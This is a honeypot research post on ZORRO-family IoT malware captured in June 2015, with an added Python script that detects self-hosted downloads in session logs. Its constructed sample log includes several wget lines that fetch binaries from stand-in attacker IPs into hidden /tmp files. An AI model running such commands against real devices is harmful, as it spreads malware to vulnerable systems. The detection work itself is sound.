IoTPOT captures new binaries of ZORRO family!
On June 7, 2015, IoTPOT captured new binaries of the "ZORRO family" built for 8 different CPU architectures. After a successful login, the attacker first checks and customizes the environment, as in previous versions of the ZORRO family (Figure 1). The attacker then appends a series of binaries to a randomly named file and builds a shell script of his own to download the malware binaries from a malware download server (Figures 2 and 3, respectively). The IP address attacking IoTPOT and the IP address of the malware download server are the same. Within 5 days (June 7 to June 11), IoTPOT detected 14,911 such infection attempts from 1 IP.
On June 8, 2015, IoTPOT captured another set of new binaries of the "ZORRO family", again built for 8 different CPU architectures. The infection process is the same as in the June 7 version of the ZORRO family; only the IP address of the malware download server and the names of the downloaded binaries differ. Figure 4 shows the downloaded binaries. IoTPOT observed this infection for only 4 days. Within those 4 days (June 8 to June 11), IoTPOT detected 10,659 such infection attempts from 1 IP. Sandbox analysis shows that these binaries scan port 23 (Figure 5).
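One property that stands out in both waves is that the malware download server is the same host as the attacking IP, and that each source produces thousands of repeated sessions per day. The script below, an added example that is not part of the IoTPOT post, parses a constructed honeypot session log (timestamp, source IP, command typed after login; the format and all addresses are assumptions) and counts, per day and source, download commands whose server is the attacker itself, which is the ZORRO-style pattern described above.

```python
# Added example (not IoTPOT's code): flag honeypot sessions in which the
# attacker downloads malware from its own IP, and count them per day/source.
from collections import Counter
from urllib.parse import urlparse
import re

# Constructed sample lines: timestamp, source IP, command typed after login.
# Addresses are documentation ranges, not real indicators.
SAMPLE_LOG = """\
2015-06-07T01:12:03Z 203.0.113.7 cat /proc/mounts
2015-06-07T01:12:04Z 203.0.113.7 wget http://203.0.113.7/z.mips -O /tmp/.x9f
2015-06-07T02:40:10Z 203.0.113.7 wget http://203.0.113.7/z.arm -O /tmp/.k2q
2015-06-08T03:05:00Z 198.51.100.9 wget http://192.0.2.50/a.sh4 -O /tmp/.v1
2015-06-08T03:09:44Z 203.0.113.7 wget http://203.0.113.7/z.x86 -O /tmp/.m7
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(.*)$")
# Download command followed by either a URL or a bare IPv4 address (tftp style).
URL_RE = re.compile(r"(?:wget|curl|tftp)\s.*?(https?://\S+|(?:\d{1,3}\.){3}\d{1,3})")


def parse_line(line):
    """Split one log line into day, source IP and the command string."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, src, cmd = m.groups()
    return {"day": ts[:10], "src": src, "cmd": cmd}


def download_host(cmd):
    """Return the host a download command fetches from, or None if not a download."""
    m = URL_RE.search(cmd)
    if not m:
        return None
    target = m.group(1)
    if target.startswith("http"):
        return urlparse(target).hostname
    return target  # bare IP given to tftp


def self_hosted_downloads(log_text):
    """Count, per (day, source IP), downloads served from the attacking IP itself."""
    counts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        host = download_host(rec["cmd"])
        if host is not None and host == rec["src"]:
            counts[(rec["day"], rec["src"])] += 1
    return counts
```

Feeding a full day of sessions through `self_hosted_downloads` gives the per-source counts that the post reports for each wave, and a source that never serves its own payload (as with 198.51.100.9 above) is not flagged.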